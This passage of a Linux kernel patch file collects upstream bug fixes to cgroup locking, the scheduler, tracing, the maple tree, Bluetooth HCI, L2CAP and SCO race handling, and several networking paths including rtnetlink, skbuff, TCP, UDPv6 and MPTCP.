+ 	.attach		= cpuset_attach,
+ 	.post_attach	= cpuset_post_attach,
+ 	.bind		= cpuset_bind,
++	.can_fork	= cpuset_can_fork,
++	.cancel_fork	= cpuset_cancel_fork,
+ 	.fork		= cpuset_fork,
+ 	.legacy_cftypes	= legacy_files,
+ 	.dfl_cftypes	= dfl_files,
+diff --git a/kernel/cgroup/legacy_freezer.c b/kernel/cgroup/legacy_freezer.c
+index 1b6b21851e9d4..936473203a6b5 100644
+--- a/kernel/cgroup/legacy_freezer.c
++++ b/kernel/cgroup/legacy_freezer.c
+@@ -22,6 +22,7 @@
+ #include <linux/freezer.h>
+ #include <linux/seq_file.h>
+ #include <linux/mutex.h>
++#include <linux/cpu.h>
+ 
+ /*
+  * A cgroup is freezing if any FREEZING flags are set.  FREEZING_SELF is
+@@ -350,7 +351,7 @@ static void freezer_apply_state(struct freezer *freezer, bool freeze,
+ 
+ 	if (freeze) {
+ 		if (!(freezer->state & CGROUP_FREEZING))
+-			static_branch_inc(&freezer_active);
++			static_branch_inc_cpuslocked(&freezer_active);
+ 		freezer->state |= state;
+ 		freeze_cgroup(freezer);
+ 	} else {
+@@ -361,7 +362,7 @@ static void freezer_apply_state(struct freezer *freezer, bool freeze,
+ 		if (!(freezer->state & CGROUP_FREEZING)) {
+ 			freezer->state &= ~CGROUP_FROZEN;
+ 			if (was_freezing)
+-				static_branch_dec(&freezer_active);
++				static_branch_dec_cpuslocked(&freezer_active);
+ 			unfreeze_cgroup(freezer);
+ 		}
+ 	}
+@@ -379,6 +380,7 @@ static void freezer_change_state(struct freezer *freezer, bool freeze)
+ {
+ 	struct cgroup_subsys_state *pos;
+ 
++	cpus_read_lock();
+ 	/*
+ 	 * Update all its descendants in pre-order traversal.  Each
+ 	 * descendant will try to inherit its parent's FREEZING state as
+@@ -407,6 +409,7 @@ static void freezer_change_state(struct freezer *freezer, bool freeze)
+ 	}
+ 	rcu_read_unlock();
+ 	mutex_unlock(&freezer_mutex);
++	cpus_read_unlock();
+ }
+ 
+ static ssize_t freezer_write(struct kernfs_open_file *of,
+diff --git a/kernel/cgroup/rstat.c b/kernel/cgroup/rstat.c
+index 793ecff290385..7006fc8dd6774 100644
+--- a/kernel/cgroup/rstat.c
++++ b/kernel/cgroup/rstat.c
+@@ -457,9 +457,7 @@ static void root_cgroup_cputime(struct cgroup_base_stat *bstat)
+ 	struct task_cputime *cputime = &bstat->cputime;
+ 	int i;
+ 
+-	cputime->stime = 0;
+-	cputime->utime = 0;
+-	cputime->sum_exec_runtime = 0;
++	memset(bstat, 0, sizeof(*bstat));
+ 	for_each_possible_cpu(i) {
+ 		struct kernel_cpustat kcpustat;
+ 		u64 *cpustat = kcpustat.cpustat;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index e046a2bff207b..661226e38835d 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -10123,6 +10123,16 @@ static inline void calculate_imbalance(struct lb_env *env, struct sd_lb_stats *s
+ 
+ 		sds->avg_load = (sds->total_load * SCHED_CAPACITY_SCALE) /
+ 				sds->total_capacity;
++
++		/*
++		 * If the local group is more loaded than the average system
++		 * load, don't try to pull any tasks.
++		 */
++		if (local->avg_load >= sds->avg_load) {
++			env->imbalance = 0;
++			return;
++		}
++
+ 	}
+ 
+ 	/*
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 1a931896ba042..13b324f008256 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1001,13 +1001,8 @@ __buffer_unlock_commit(struct trace_buffer *buffer, struct ring_buffer_event *ev
+ 		ring_buffer_unlock_commit(buffer);
+ }
+ 
+-/**
+- * __trace_puts - write a constant string into the trace buffer.
+- * @ip:	   The address of the caller
+- * @str:   The constant string to write
+- * @size:  The size of the string.
+- */
+-int __trace_puts(unsigned long ip, const char *str, int size)
++int __trace_array_puts(struct trace_array *tr, unsigned long ip,
++		       const char *str, int size)
+ {
+ 	struct ring_buffer_event *event;
+ 	struct trace_buffer *buffer;
+@@ -1015,7 +1010,7 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 	unsigned int trace_ctx;
+ 	int alloc;
+ 
+-	if (!(global_trace.trace_flags & TRACE_ITER_PRINTK))
++	if (!(tr->trace_flags & TRACE_ITER_PRINTK))
+ 		return 0;
+ 
+ 	if (unlikely(tracing_selftest_running || tracing_disabled))
+@@ -1024,7 +1019,7 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 	alloc = sizeof(*entry) + size + 2; /* possible \n added */
+ 
+ 	trace_ctx = tracing_gen_ctx();
+-	buffer = global_trace.array_buffer.buffer;
++	buffer = tr->array_buffer.buffer;
+ 	ring_buffer_nest_start(buffer);
+ 	event = __trace_buffer_lock_reserve(buffer, TRACE_PRINT, alloc,
+ 					    trace_ctx);
+@@ -1046,11 +1041,23 @@ int __trace_puts(unsigned long ip, const char *str, int size)
+ 		entry->buf[size] = '\0';
+ 
+ 	__buffer_unlock_commit(buffer, event);
+-	ftrace_trace_stack(&global_trace, buffer, trace_ctx, 4, NULL);
++	ftrace_trace_stack(tr, buffer, trace_ctx, 4, NULL);
+  out:
+ 	ring_buffer_nest_end(buffer);
+ 	return size;
+ }
++EXPORT_SYMBOL_GPL(__trace_array_puts);
++
++/**
++ * __trace_puts - write a constant string into the trace buffer.
++ * @ip:	   The address of the caller
++ * @str:   The constant string to write
++ * @size:  The size of the string.
++ */
++int __trace_puts(unsigned long ip, const char *str, int size)
++{
++	return __trace_array_puts(&global_trace, ip, str, size);
++}
+ EXPORT_SYMBOL_GPL(__trace_puts);
+ 
+ /**
+@@ -1104,22 +1111,22 @@ static void tracing_snapshot_instance_cond(struct trace_array *tr,
+ 	unsigned long flags;
+ 
+ 	if (in_nmi()) {
+-		internal_trace_puts("*** SNAPSHOT CALLED FROM NMI CONTEXT ***\n");
+-		internal_trace_puts("*** snapshot is being ignored        ***\n");
++		trace_array_puts(tr, "*** SNAPSHOT CALLED FROM NMI CONTEXT ***\n");
++		trace_array_puts(tr, "*** snapshot is being ignored        ***\n");
+ 		return;
+ 	}
+ 
+ 	if (!tr->allocated_snapshot) {
+-		internal_trace_puts("*** SNAPSHOT NOT ALLOCATED ***\n");
+-		internal_trace_puts("*** stopping trace here!   ***\n");
+-		tracing_off();
++		trace_array_puts(tr, "*** SNAPSHOT NOT ALLOCATED ***\n");
++		trace_array_puts(tr, "*** stopping trace here!   ***\n");
++		tracer_tracing_off(tr);
+ 		return;
+ 	}
+ 
+ 	/* Note, snapshot can not be used when the tracer uses it */
+ 	if (tracer->use_max_tr) {
+-		internal_trace_puts("*** LATENCY TRACER ACTIVE ***\n");
+-		internal_trace_puts("*** Can not use snapshot (sorry) ***\n");
++		trace_array_puts(tr, "*** LATENCY TRACER ACTIVE ***\n");
++		trace_array_puts(tr, "*** Can not use snapshot (sorry) ***\n");
+ 		return;
+ 	}
+ 
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index fb452873914f2..022573f499578 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -178,7 +178,7 @@ static void mt_free_rcu(struct rcu_head *head)
+  */
+ static void ma_free_rcu(struct maple_node *node)
+ {
+-	node->parent = ma_parent_ptr(node);
++	WARN_ON(node->parent != ma_parent_ptr(node));
+ 	call_rcu(&node->rcu, mt_free_rcu);
+ }
+ 
+@@ -1785,8 +1785,10 @@ static inline void mas_replace(struct ma_state *mas, bool advanced)
+ 		rcu_assign_pointer(slots[offset], mas->node);
+ 	}
+ 
+-	if (!advanced)
++	if (!advanced) {
++		mte_set_node_dead(old_enode);
+ 		mas_free(mas, old_enode);
++	}
+ }
+ 
+ /*
+@@ -4221,6 +4223,7 @@ static inline bool mas_wr_node_store(struct ma_wr_state *wr_mas)
+ done:
+ 	mas_leaf_set_meta(mas, newnode, dst_pivots, maple_leaf_64, new_end);
+ 	if (in_rcu) {
++		mte_set_node_dead(mas->node);
+ 		mas->node = mt_mk_node(newnode, wr_mas->type);
+ 		mas_replace(mas, false);
+ 	} else {
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index c64050e839ac6..1fffe2bed5b02 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -280,6 +280,10 @@ static void xen_9pfs_front_free(struct xen_9pfs_front_priv *priv)
+ 	write_unlock(&xen_9pfs_lock);
+ 
+ 	for (i = 0; i < priv->num_rings; i++) {
++		struct xen_9pfs_dataring *ring = &priv->rings[i];
++
++		cancel_work_sync(&ring->work);
++
+ 		if (!priv->rings[i].intf)
+ 			break;
+ 		if (priv->rings[i].irq > 0)
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 61a34801e61ea..bd38e36e5a58a 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -68,7 +68,7 @@ static const struct sco_param esco_param_msbc[] = {
+ };
+ 
+ /* This function requires the caller holds hdev->lock */
+-static void hci_connect_le_scan_cleanup(struct hci_conn *conn)
++static void hci_connect_le_scan_cleanup(struct hci_conn *conn, u8 status)
+ {
+ 	struct hci_conn_params *params;
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -88,9 +88,28 @@ static void hci_connect_le_scan_cleanup(struct hci_conn *conn)
+ 
+ 	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, bdaddr,
+ 					   bdaddr_type);
+-	if (!params || !params->explicit_connect)
++	if (!params)
+ 		return;
+ 
++	if (params->conn) {
++		hci_conn_drop(params->conn);
++		hci_conn_put(params->conn);
++		params->conn = NULL;
++	}
++
++	if (!params->explicit_connect)
++		return;
++
++	/* If the status indicates successful cancellation of
++	 * the attempt (i.e. Unknown Connection Id) there's no point of
++	 * notifying failure since we'll go back to keep trying to
++	 * connect. The only exception is explicit connect requests
++	 * where a timeout + cancel does indicate an actual failure.
++	 */
++	if (status && status != HCI_ERROR_UNKNOWN_CONN_ID)
++		mgmt_connect_failed(hdev, &conn->dst, conn->type,
++				    conn->dst_type, status);
++
+ 	/* The connection attempt was doing scan for new RPA, and is
+ 	 * in scan phase. If params are not associated with any other
+ 	 * autoconnect action, remove them completely. If they are, just unmark
+@@ -178,7 +197,7 @@ static void le_scan_cleanup(struct work_struct *work)
+ 	rcu_read_unlock();
+ 
+ 	if (c == conn) {
+-		hci_connect_le_scan_cleanup(conn);
++		hci_connect_le_scan_cleanup(conn, 0x00);
+ 		hci_conn_cleanup(conn);
+ 	}
+ 
+@@ -1049,6 +1068,17 @@ struct hci_conn *hci_conn_add(struct hci_dev *hdev, int type, bdaddr_t *dst,
+ 	return conn;
+ }
+ 
++static bool hci_conn_unlink(struct hci_conn *conn)
++{
++	if (!conn->link)
++		return false;
++
++	conn->link->link = NULL;
++	conn->link = NULL;
++
++	return true;
++}
++
+ int hci_conn_del(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -1060,9 +1090,17 @@ int hci_conn_del(struct hci_conn *conn)
+ 	cancel_delayed_work_sync(&conn->idle_work);
+ 
+ 	if (conn->type == ACL_LINK) {
+-		struct hci_conn *sco = conn->link;
+-		if (sco)
+-			sco->link = NULL;
++		struct hci_conn *link = conn->link;
++
++		if (link) {
++			hci_conn_unlink(conn);
++			/* Due to a race, the SCO connection might not be
++			 * established yet at this point. Delete it now,
++			 * otherwise it can get stuck and never be deleted.
++			 */
++			if (link->handle == HCI_CONN_HANDLE_UNSET)
++				hci_conn_del(link);
++		}
+ 
+ 		/* Unacked frames */
+ 		hdev->acl_cnt += conn->sent;
+@@ -1077,7 +1115,7 @@ int hci_conn_del(struct hci_conn *conn)
+ 		struct hci_conn *acl = conn->link;
+ 
+ 		if (acl) {
+-			acl->link = NULL;
++			hci_conn_unlink(conn);
+ 			hci_conn_drop(acl);
+ 		}
+ 
+@@ -1172,31 +1210,8 @@ EXPORT_SYMBOL(hci_get_route);
+ static void hci_le_conn_failed(struct hci_conn *conn, u8 status)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+-	struct hci_conn_params *params;
+-
+-	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, &conn->dst,
+-					   conn->dst_type);
+-	if (params && params->conn) {
+-		hci_conn_drop(params->conn);
+-		hci_conn_put(params->conn);
+-		params->conn = NULL;
+-	}
+-
+-	/* If the status indicates successful cancellation of
+-	 * the attempt (i.e. Unknown Connection Id) there's no point of
+-	 * notifying failure since we'll go back to keep trying to
+-	 * connect. The only exception is explicit connect requests
+-	 * where a timeout + cancel does indicate an actual failure.
+-	 */
+-	if (status != HCI_ERROR_UNKNOWN_CONN_ID ||
+-	    (params && params->explicit_connect))
+-		mgmt_connect_failed(hdev, &conn->dst, conn->type,
+-				    conn->dst_type, status);
+ 
+-	/* Since we may have temporarily stopped the background scanning in
+-	 * favor of connection establishment, we should restart it.
+-	 */
+-	hci_update_passive_scan(hdev);
++	hci_connect_le_scan_cleanup(conn, status);
+ 
+ 	/* Enable advertising in case this was a failed connection
+ 	 * attempt as a peripheral.
+@@ -1230,15 +1245,15 @@ static void create_le_conn_complete(struct hci_dev *hdev, void *data, int err)
+ {
+ 	struct hci_conn *conn = data;
+ 
++	bt_dev_dbg(hdev, "err %d", err);
++
+ 	hci_dev_lock(hdev);
+ 
+ 	if (!err) {
+-		hci_connect_le_scan_cleanup(conn);
++		hci_connect_le_scan_cleanup(conn, 0x00);
+ 		goto done;
+ 	}
+ 
+-	bt_dev_err(hdev, "request failed to create LE connection: err %d", err);
+-
+ 	/* Check if connection is still pending */
+ 	if (conn != hci_lookup_le_connect(hdev))
+ 		goto done;
+@@ -2429,6 +2444,12 @@ void hci_conn_hash_flush(struct hci_dev *hdev)
+ 		c->state = BT_CLOSED;
+ 
+ 		hci_disconn_cfm(c, HCI_ERROR_LOCAL_HOST_TERM);
++
++		/* Unlink before deleting otherwise it is possible that
++		 * hci_conn_del removes the link which may cause the list to
++		 * contain items already freed.
++		 */
++		hci_conn_unlink(c);
+ 		hci_conn_del(c);
+ 	}
+ }
+@@ -2766,6 +2787,9 @@ int hci_abort_conn(struct hci_conn *conn, u8 reason)
+ {
+ 	int r = 0;
+ 
++	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++		return 0;
++
+ 	switch (conn->state) {
+ 	case BT_CONNECTED:
+ 	case BT_CONFIG:
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index ad92a4be58517..e87c928c9e17a 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -2881,16 +2881,6 @@ static void cs_le_create_conn(struct hci_dev *hdev, bdaddr_t *peer_addr,
+ 
+ 	conn->resp_addr_type = peer_addr_type;
+ 	bacpy(&conn->resp_addr, peer_addr);
+-
+-	/* We don't want the connection attempt to stick around
+-	 * indefinitely since LE doesn't have a page timeout concept
+-	 * like BR/EDR. Set a timer for any connection that doesn't use
+-	 * the accept list for connecting.
+-	 */
+-	if (filter_policy == HCI_LE_USE_PEER_ADDR)
+-		queue_delayed_work(conn->hdev->workqueue,
+-				   &conn->le_conn_timeout,
+-				   conn->conn_timeout);
+ }
+ 
+ static void hci_cs_le_create_conn(struct hci_dev *hdev, u8 status)
+@@ -5902,6 +5892,12 @@ static void le_conn_complete_evt(struct hci_dev *hdev, u8 status,
+ 	if (status)
+ 		goto unlock;
+ 
++	/* Drop the connection if it has been aborted */
++	if (test_bit(HCI_CONN_CANCEL, &conn->flags)) {
++		hci_conn_drop(conn);
++		goto unlock;
++	}
++
+ 	if (conn->dst_type == ADDR_LE_DEV_PUBLIC)
+ 		addr_type = BDADDR_LE_PUBLIC;
+ 	else
+@@ -6995,7 +6991,7 @@ static void hci_le_big_sync_established_evt(struct hci_dev *hdev, void *data,
+ 		bis->iso_qos.in.latency = le16_to_cpu(ev->interval) * 125 / 100;
+ 		bis->iso_qos.in.sdu = le16_to_cpu(ev->max_pdu);
+ 
+-		hci_connect_cfm(bis, ev->status);
++		hci_iso_setup_path(bis);
+ 	}
+ 
+ 	hci_dev_unlock(hdev);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 5a6aa1627791b..632be12672887 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -246,8 +246,9 @@ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 
+ 	skb = __hci_cmd_sync_sk(hdev, opcode, plen, param, event, timeout, sk);
+ 	if (IS_ERR(skb)) {
+-		bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
+-				PTR_ERR(skb));
++		if (!event)
++			bt_dev_err(hdev, "Opcode 0x%4x failed: %ld", opcode,
++				   PTR_ERR(skb));
+ 		return PTR_ERR(skb);
+ 	}
+ 
+@@ -5126,8 +5127,11 @@ static int hci_le_connect_cancel_sync(struct hci_dev *hdev,
+ 	if (test_bit(HCI_CONN_SCANNING, &conn->flags))
+ 		return 0;
+ 
++	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++		return 0;
++
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_CREATE_CONN_CANCEL,
+-				     6, &conn->dst, HCI_CMD_TIMEOUT);
++				     0, NULL, HCI_CMD_TIMEOUT);
+ }
+ 
+ static int hci_connect_cancel_sync(struct hci_dev *hdev, struct hci_conn *conn)
+@@ -6102,6 +6106,9 @@ int hci_le_create_conn_sync(struct hci_dev *hdev, struct hci_conn *conn)
+ 				       conn->conn_timeout, NULL);
+ 
+ done:
++	if (err == -ETIMEDOUT)
++		hci_le_connect_cancel_sync(hdev, conn);
++
+ 	/* Re-enable advertising after the connection attempt is finished. */
+ 	hci_resume_advertising_sync(hdev);
+ 	return err;
+diff --git a/net/bluetooth/hidp/core.c b/net/bluetooth/hidp/core.c
+index cc20e706c6391..82cc15ad963d8 100644
+--- a/net/bluetooth/hidp/core.c
++++ b/net/bluetooth/hidp/core.c
+@@ -433,7 +433,7 @@ static void hidp_set_timer(struct hidp_session *session)
+ static void hidp_del_timer(struct hidp_session *session)
+ {
+ 	if (session->idle_to > 0)
+-		del_timer(&session->timer);
++		del_timer_sync(&session->timer);
+ }
+ 
+ static void hidp_process_report(struct hidp_session *session, int type,
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 49926f59cc123..55a7226233f96 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -4652,33 +4652,27 @@ static inline int l2cap_disconnect_req(struct l2cap_conn *conn,
+ 
+ 	BT_DBG("scid 0x%4.4x dcid 0x%4.4x", scid, dcid);
+ 
+-	mutex_lock(&conn->chan_lock);
+-
+-	chan = __l2cap_get_chan_by_scid(conn, dcid);
++	chan = l2cap_get_chan_by_scid(conn, dcid);
+ 	if (!chan) {
+-		mutex_unlock(&conn->chan_lock);
+ 		cmd_reject_invalid_cid(conn, cmd->ident, dcid, scid);
+ 		return 0;
+ 	}
+ 
+-	l2cap_chan_hold(chan);
+-	l2cap_chan_lock(chan);
+-
+ 	rsp.dcid = cpu_to_le16(chan->scid);
+ 	rsp.scid = cpu_to_le16(chan->dcid);
+ 	l2cap_send_cmd(conn, cmd->ident, L2CAP_DISCONN_RSP, sizeof(rsp), &rsp);
+ 
+ 	chan->ops->set_shutdown(chan);
+ 
++	mutex_lock(&conn->chan_lock);
+ 	l2cap_chan_del(chan, ECONNRESET);
++	mutex_unlock(&conn->chan_lock);
+ 
+ 	chan->ops->close(chan);
+ 
+ 	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ 
+-	mutex_unlock(&conn->chan_lock);
+-
+ 	return 0;
+ }
+ 
+@@ -4698,33 +4692,27 @@ static inline int l2cap_disconnect_rsp(struct l2cap_conn *conn,
+ 
+ 	BT_DBG("dcid 0x%4.4x scid 0x%4.4x", dcid, scid);
+ 
+-	mutex_lock(&conn->chan_lock);
+-
+-	chan = __l2cap_get_chan_by_scid(conn, scid);
++	chan = l2cap_get_chan_by_scid(conn, scid);
+ 	if (!chan) {
+ 		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
+-	l2cap_chan_hold(chan);
+-	l2cap_chan_lock(chan);
+-
+ 	if (chan->state != BT_DISCONN) {
+ 		l2cap_chan_unlock(chan);
+ 		l2cap_chan_put(chan);
+-		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
++	mutex_lock(&conn->chan_lock);
+ 	l2cap_chan_del(chan, 0);
++	mutex_unlock(&conn->chan_lock);
+ 
+ 	chan->ops->close(chan);
+ 
+ 	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ 
+-	mutex_unlock(&conn->chan_lock);
+-
+ 	return 0;
+ }
+ 
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 1111da4e2f2bd..1755f91a66f6a 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -1129,6 +1129,8 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
++		release_sock(sk);
++
+ 		/* find total buffer size required to copy codec + caps */
+ 		hci_dev_lock(hdev);
+ 		list_for_each_entry(c, &hdev->local_codecs, list) {
+@@ -1146,15 +1148,13 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 		buf_len += sizeof(struct bt_codecs);
+ 		if (buf_len > len) {
+ 			hci_dev_put(hdev);
+-			err = -ENOBUFS;
+-			break;
++			return -ENOBUFS;
+ 		}
+ 		ptr = optval;
+ 
+ 		if (put_user(num_codecs, ptr)) {
+ 			hci_dev_put(hdev);
+-			err = -EFAULT;
+-			break;
++			return -EFAULT;
+ 		}
+ 		ptr += sizeof(num_codecs);
+ 
+@@ -1194,12 +1194,14 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 			ptr += len;
+ 		}
+ 
+-		if (!err && put_user(buf_len, optlen))
+-			err = -EFAULT;
+-
+ 		hci_dev_unlock(hdev);
+ 		hci_dev_put(hdev);
+ 
++		lock_sock(sk);
++
++		if (!err && put_user(buf_len, optlen))
++			err = -EFAULT;
++
+ 		break;
+ 
+ 	default:
+diff --git a/net/core/dev.c b/net/core/dev.c
+index fce980d531bdc..404125e7a57a5 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3196,6 +3196,7 @@ static u16 skb_tx_hash(const struct net_device *dev,
+ 	}
+ 
+ 	if (skb_rx_queue_recorded(skb)) {
++		DEBUG_NET_WARN_ON_ONCE(qcount == 0);
+ 		hash = skb_get_rx_queue(skb);
+ 		if (hash >= qoffset)
+ 			hash -= qoffset;
+@@ -10836,7 +10837,7 @@ void unregister_netdevice_many_notify(struct list_head *head,
+ 		    dev->rtnl_link_state == RTNL_LINK_INITIALIZED)
+ 			skb = rtmsg_ifinfo_build_skb(RTM_DELLINK, dev, ~0U, 0,
+ 						     GFP_KERNEL, NULL, 0,
+-						     portid, nlmsg_seq(nlh));
++						     portid, nlh);
+ 
+ 		/*
+ 		 *	Flush the unicast and multicast chains
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 64289bc988878..f5114b2395ae3 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -3939,16 +3939,23 @@ static int rtnl_dump_all(struct sk_buff *skb, struct netlink_callback *cb)
+ struct sk_buff *rtmsg_ifinfo_build_skb(int type, struct net_device *dev,
+ 				       unsigned int change,
+ 				       u32 event, gfp_t flags, int *new_nsid,
+-				       int new_ifindex, u32 portid, u32 seq)
++				       int new_ifindex, u32 portid,
++				       const struct nlmsghdr *nlh)
+ {
+ 	struct net *net = dev_net(dev);
+ 	struct sk_buff *skb;
+ 	int err = -ENOBUFS;
++	u32 seq = 0;
+ 
+ 	skb = nlmsg_new(if_nlmsg_size(dev, 0), flags);
+ 	if (skb == NULL)
+ 		goto errout;
+ 
++	if (nlmsg_report(nlh))
++		seq = nlmsg_seq(nlh);
++	else
++		portid = 0;
++
+ 	err = rtnl_fill_ifinfo(skb, dev, dev_net(dev),
+ 			       type, portid, seq, change, 0, 0, event,
+ 			       new_nsid, new_ifindex, -1, flags);
+@@ -3984,7 +3991,7 @@ static void rtmsg_ifinfo_event(int type, struct net_device *dev,
+ 		return;
+ 
+ 	skb = rtmsg_ifinfo_build_skb(type, dev, change, event, flags, new_nsid,
+-				     new_ifindex, portid, nlmsg_seq(nlh));
++				     new_ifindex, portid, nlh);
+ 	if (skb)
+ 		rtmsg_ifinfo_send(skb, dev, flags, portid, nlh);
+ }
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index a31ff4d83ecc4..43e1b89695c22 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5475,18 +5475,18 @@ bool skb_try_coalesce(struct sk_buff *to, struct sk_buff *from,
+ 	if (skb_cloned(to))
+ 		return false;
+ 
+-	/* In general, avoid mixing slab allocated and page_pool allocated
+-	 * pages within the same SKB. However when @to is not pp_recycle and
+-	 * @from is cloned, we can transition frag pages from page_pool to
+-	 * reference counted.
+-	 *
+-	 * On the other hand, don't allow coalescing two pp_recycle SKBs if
+-	 * @from is cloned, in case the SKB is using page_pool fragment
++	/* In general, avoid mixing page_pool and non-page_pool allocated
++	 * pages within the same SKB. Additionally avoid dealing with clones
++	 * with page_pool pages, in case the SKB is using page_pool fragment
+ 	 * references (PP_FLAG_PAGE_FRAG). Since we only take full page
+ 	 * references for cloned SKBs at the moment that would result in
+ 	 * inconsistent reference counts.
++	 * In theory we could take full references if @from is cloned and
++	 * !@to->pp_recycle but it's tricky (due to potential race with
++	 * the clone disappearing) and rare, so not worth dealing with.
+ 	 */
+-	if (to->pp_recycle != (from->pp_recycle && !skb_cloned(from)))
++	if (to->pp_recycle != from->pp_recycle ||
++	    (from->pp_recycle && skb_cloned(from)))
+ 		return false;
+ 
+ 	if (len <= skb_tailroom(to)) {
+diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
+index 0d0cc4ef2b85a..40fe70fc2015d 100644
+--- a/net/ipv4/sysctl_net_ipv4.c
++++ b/net/ipv4/sysctl_net_ipv4.c
+@@ -25,6 +25,7 @@ static int ip_local_port_range_min[] = { 1, 1 };
+ static int ip_local_port_range_max[] = { 65535, 65535 };
+ static int tcp_adv_win_scale_min = -31;
+ static int tcp_adv_win_scale_max = 31;
++static int tcp_app_win_max = 31;
+ static int tcp_min_snd_mss_min = TCP_MIN_SND_MSS;
+ static int tcp_min_snd_mss_max = 65535;
+ static int ip_privileged_port_min;
+@@ -1198,6 +1199,8 @@ static struct ctl_table ipv4_net_table[] = {
+ 		.maxlen		= sizeof(u8),
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dou8vec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= &tcp_app_win_max,
+ 	},
+ 	{
+ 		.procname	= "tcp_adv_win_scale",
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 8320d0ecb13ae..339a9cea90473 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -2779,7 +2779,7 @@ static int tcp_prog_seq_show(struct bpf_prog *prog, struct bpf_iter_meta *meta,
+ static void bpf_iter_tcp_put_batch(struct bpf_tcp_iter_state *iter)
+ {
+ 	while (iter->cur_sk < iter->end_sk)
+-		sock_put(iter->batch[iter->cur_sk++]);
++		sock_gen_put(iter->batch[iter->cur_sk++]);
+ }
+ 
+ static int bpf_iter_tcp_realloc_batch(struct bpf_tcp_iter_state *iter,
+@@ -2940,7 +2940,7 @@ static void *bpf_iter_tcp_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ 		 * st->bucket.  See tcp_seek_last_pos().
+ 		 */
+ 		st->offset++;
+-		sock_put(iter->batch[iter->cur_sk++]);
++		sock_gen_put(iter->batch[iter->cur_sk++]);
+ 	}
+ 
+ 	if (iter->cur_sk < iter->end_sk)
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 9fb2f33ee3a76..a675acfb901d1 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1395,9 +1395,11 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 			msg->msg_name = &sin;
+ 			msg->msg_namelen = sizeof(sin);
+ do_udp_sendmsg:
+-			if (ipv6_only_sock(sk))
+-				return -ENETUNREACH;
+-			return udp_sendmsg(sk, msg, len);
++			err = ipv6_only_sock(sk) ?
++				-ENETUNREACH : udp_sendmsg(sk, msg, len);
++			msg->msg_name = sin6;
++			msg->msg_namelen = addr_len;
++			return err;
+ 		}
+ 	}
+ 
+diff --git a/net/mptcp/fastopen.c b/net/mptcp/fastopen.c
+index d237d142171c5..bceaab8dd8e46 100644
+--- a/net/mptcp/fastopen.c
++++ b/net/mptcp/fastopen.c
+@@ -9,11 +9,18 @@
+ void mptcp_fastopen_subflow_synack_set_params(struct mptcp_subflow_context *subflow,
+ 					      struct request_sock *req)
+ {
+-	struct sock *ssk = subflow->tcp_sock;
+-	struct sock *sk = subflow->conn;
++	struct sock *sk, *ssk;
+ 	struct sk_buff *skb;
+ 	struct tcp_sock *tp;
+ 
++	/* on early fallback the subflow context is deleted by
++	 * subflow_syn_recv_sock()
++	 */
++	if (!subflow)
++		return;
++
++	ssk = subflow->tcp_sock;
++	sk = subflow->conn;
+ 	tp = tcp_sk(ssk);
+ 
+ 	subflow->is_mptfo = 1;
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 5ded85e2c374a..3872eadb076bc 100644
